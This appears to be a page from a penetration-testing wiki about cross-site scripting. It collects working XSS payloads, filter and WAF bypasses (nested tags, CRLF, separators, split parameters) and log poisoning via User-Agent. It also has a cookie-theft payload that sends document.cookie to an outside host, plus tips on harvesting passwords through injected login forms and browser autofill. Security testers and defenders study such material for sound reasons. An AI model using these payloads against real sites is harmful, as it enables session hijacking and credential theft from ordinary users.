XSS/Cross Site Scripting

XSSable Locations

In the Document

XSS can occur as a result of the following things:

  • The attacker can inject certain HTML tags

    • The simplest example is the <script> tag, but others can also work, such as <img src=x onerror=alert(1)>

  • The attacker can inject text in between certain tags or in certain fields

    • The same as above, but instead of injecting the tag, the tag already exists, and the attacker is able to write text in between the tag.

    • For example, there's a <img src=ATTACKER_INPUT_HERE> tag, and the attacker injects x onerror=alert(1)

  • The attacker can inject a malicious URL.

    • For example, <a href="javascript:alert(1)">click me</a>

Log Poisoning

You can try to sneak XSS payloads into logs. If the application that views the logs treats input insecurely, then it might result in XSS.

If the User-Agent header is logged, then putting the payload there would be an easy way to get javascript into the log file.

Payload Variations

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS Injection

Here are some common ones:

# Normal script tags
<script>alert(1)</script>

# HTML attributes, like img onerror
<iMg src=x onerror=prompt(1337);>

# XSS in between tags
<img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />     ← injecting ‘);alert(‘xss 

# Iframe xss, bypasses some sanitizers if “srcdoc” attribute is allowed
<iframe srcdoc="&lt;img src=x:x onerror=alert(1)&gt;"></iframe>

Stealing Things

Catch and Store Stolen Credentials

Cookies

If cookies are configured to be accessible via Javascript (no HttpOnly flag), then you can just fetch the cookie and do a GET request to a site you control:

<iMg src=x oNerRor=this.src='https://mysite.com/somepage?creds='+document.cookie>

If you need a site for catching cookies, then https://requestcatcher.com/ should be useful.

Passwords

TODO: Link phishing page under Social Engineering or Web App Hacking?

You can capture a user's password. For example:

  1. You can display a login page to the user and capture their password if they choose to enter it.

  2. If the victim’s browser has remember password enabled, you can put a login form on the page, wait 1 second while the browser pastes their password there and then capture that.

Filter Bypassing

Multiple Fields Method

Works for Chrome XSS Auditor and many other filters. The bypass works by having two query parameters that you can inject into. When you combine the two injections, then a valid javascript payload is formed, and the XSS auditor doesn't detect it.

For example, the first parameter:

<script>alert("hi

The second parameter: 

");</script>

More bypasses: https://www.youtube.com/watch?v=8GwVBpTgR2c

Global Variables

https://materials.rangeforce.com/tutorial/2019/10/23/ModSecurity-Filter-Evasion/

This works for weak (default) ModSecurity rulesets.

Simple example:

<scirpt>self["alert"]("foo");</script>

Nested Payloads

If malicious input is stripped only once, then try nested payloads:

<scri<script>pt>alert(1)</scri</script>pt>

Various Payloads

Here are some more interesting payloads:

# Iframe XSS
<iframe srcdoc="&lt;img src=x:x onerror=alert(1)&gt;"></iframe>

# Against server-side parsers, this was an XSS in Google
<noscript><p title="</noscript><img src=x onerror=alert(1)>"> 

# CRLF injection to bypass javascript: being blacklisted
java%0d%0ascript%0d%0a:alert(0)

# incase svg onload= is filtered, the %0d acts as a seperator and can sometimes confuse wafs.
# %0a %0c %09 %00 are also common separators to use here.
<svg%0donload=prompt(1)>

# Uncommon XSS vector
<input onfocus=alert(0) autofocus>

# The use of \\ will break out of a quote inside a script tag
\\"-alert(0);//

# onmouseenter is like onmouseover, and confirm is like prompt
"onmouseenter=confirm(1)>

PreviousSession FixationNextCSS Injection

Last updated